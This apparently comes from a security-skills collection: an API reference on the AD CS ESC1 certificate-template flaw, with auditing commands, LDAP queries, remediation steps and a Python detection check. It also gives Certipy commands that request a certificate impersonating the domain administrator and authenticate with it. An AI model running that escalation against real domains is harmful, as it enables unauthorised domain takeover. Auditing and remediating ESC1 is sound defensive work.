mukul975 c21af3347e Complete folder anatomy for all 649 cybersecurity skills + update LICENSE to Mahipal
- Add scripts/agent.py and references/api-reference.md to all remaining skills
- Update all 648 LICENSE files: copyright now reads 'Mahipal'
- Add implementing-security-monitoring-with-datadog (new skill with full anatomy)
- All 649 skills now have: SKILL.md, LICENSE, scripts/agent.py, references/api-reference.md
2026-03-11 00:22:12 +01:00


API Reference: AD CS ESC1 Vulnerability

ESC1 — Enrollee Supplies Subject Alternative Name

Vulnerability Conditions

  1. Template allows enrollee to supply SAN (CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)
  2. Template has Client Authentication EKU (OID 1.3.6.1.5.5.7.3.2)
  3. Low-privileged users (Domain Users) can enroll
  4. No manager approval required

Certipy — AD CS Auditing Tool

Find Vulnerable Templates

certipy find -u user@domain.local -p password -dc-ip 10.10.10.1 -vulnerable

Request Certificate with SAN (ESC1)

certipy req -u user@domain.local -p password -dc-ip 10.10.10.1 \
    -ca CORP-CA -template VulnerableTemplate \
    -upn administrator@domain.local

Authenticate with Certificate

certipy auth -pfx administrator.pfx -dc-ip 10.10.10.1

certutil — Windows Built-in

List Templates

certutil -v -template
certutil -catemplates
certutil -TCAInfo

Request Certificate

certutil -submit -attrib "SAN:upn=admin@domain.local" request.req

Certificate Template Flags

msPKI-Certificate-Name-Flag

Value       Name                                        Risk
0x00000001  CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT           CRITICAL
0x00010000  CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT_ALT_NAME  CRITICAL

msPKI-Enrollment-Flag

Value       Name
0x00000002  CT_FLAG_PEND_ALL_REQUESTS (manager approval)
0x00000020  CT_FLAG_AUTO_ENROLLMENT

LDAP Queries for AD CS

Find templates with ENROLLEE_SUPPLIES_SUBJECT

(&(objectClass=pKICertificateTemplate)
  (msPKI-Certificate-Name-Flag:1.2.840.113556.1.4.804:=1))

Find CAs

(objectClass=pKIEnrollmentService)

PowerShell — PSPKI Module

Install

Install-Module -Name PSPKI

Get Templates

Get-CertificateTemplate | Where-Object {
    $_.Flags -band 1  # ENROLLEE_SUPPLIES_SUBJECT
} | Select-Object Name, Flags, OID

Remediation

  1. Remove CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT from template flags
  2. Require CA manager approval for certificate issuance
  3. Restrict enrollment permissions to specific security groups
  4. Enable certificate auditing (Event ID 4887)
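
Added example (not part of the original reference or the project's scripts): a check that evaluates the four ESC1 conditions listed under Vulnerability Conditions against template attributes already exported from LDAP, so a template can be compared before and after remediation. The dictionary layout, the `enroll_principals` key, the `BROAD_PRINCIPALS` set and the sample templates are assumptions; the flag values and EKU OID are the ones given above.

```python
# Added example: ESC1 condition check. Input layout is an assumption.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # msPKI-Enrollment-Flag
CLIENT_AUTH_EKU = "1.3.6.1.5.5.7.3.2"
# Assumption: principals counted as low-privileged; adjust per environment.
BROAD_PRINCIPALS = {"domain users", "authenticated users", "everyone"}


def as_u32(value):
    """Flag attributes arrive from LDAP as signed 32-bit decimal strings."""
    return int(value) & 0xFFFFFFFF


def esc1_findings(template):
    """Return which of the four ESC1 conditions the template meets."""
    name_flag = as_u32(template.get("msPKI-Certificate-Name-Flag", 0))
    enroll_flag = as_u32(template.get("msPKI-Enrollment-Flag", 0))
    ekus = set(template.get("pKIExtendedKeyUsage", []))
    enrollers = {p.split("\\")[-1].lower()
                 for p in template.get("enroll_principals", [])}
    findings = []
    if name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        findings.append("enrollee supplies subject")
    if CLIENT_AUTH_EKU in ekus:
        findings.append("client authentication EKU")
    if enrollers & BROAD_PRINCIPALS:
        findings.append("low-privileged enrollment")
    if not enroll_flag & CT_FLAG_PEND_ALL_REQUESTS:
        findings.append("no manager approval")
    return findings


def is_esc1(template):
    """ESC1 applies only when all four conditions hold together."""
    return len(esc1_findings(template)) == 4


# Constructed sample data, not taken from a real directory.
BEFORE = {
    "msPKI-Certificate-Name-Flag": "1",
    "msPKI-Enrollment-Flag": "0",
    "pKIExtendedKeyUsage": [CLIENT_AUTH_EKU],
    "enroll_principals": ["CORP\\Domain Users"],
}
# After remediation steps 1-3; the name flag is a negative signed value
# (0x82000000) whose ENROLLEE_SUPPLIES_SUBJECT bit is clear.
AFTER = dict(BEFORE, **{"msPKI-Certificate-Name-Flag": "-2113929216",
                        "msPKI-Enrollment-Flag": "2",
                        "enroll_principals": ["CORP\\PKI-Enrollers"]})
```

Masking with `0xFFFFFFFF` matters because a name flag with the high bit set is returned as a negative number, and comparing the raw value for equality with 1 would miss templates that combine the enrollee-supplied bit with other flags.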